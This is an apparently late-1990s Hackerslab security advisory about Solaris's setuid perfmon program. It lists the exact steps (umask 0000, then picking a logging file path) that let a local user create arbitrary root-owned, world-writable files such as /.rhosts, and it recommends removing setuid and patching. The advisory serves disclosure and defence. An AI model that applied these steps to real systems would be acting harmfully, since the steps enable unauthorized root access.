==============================================================================
[ Hackerslab bug_paper ] SunOS application perfmon vulnerability
==============================================================================
File : /opt/JSParm/bin/perfmon
SYSTEM : Solaris 2.X
INFO :
parm is a program that displays system information .
parm is SunOS application. It's not included in Solaris basic package.
There is a vulneribility in perfmon program that you can create
any file with root privilege as follow:
$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &
Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex:) /.rhosts
following file is created in a second.
-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost
SOLUTION :
remove setuid permition, contact your vendor and get a patch.
==-------------------------------------------------------------------------------==
********
* ** ** *
* ** ** *
* ****** *
* ** ** * [EMAIL PROTECTED]
* ** ** * [ http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
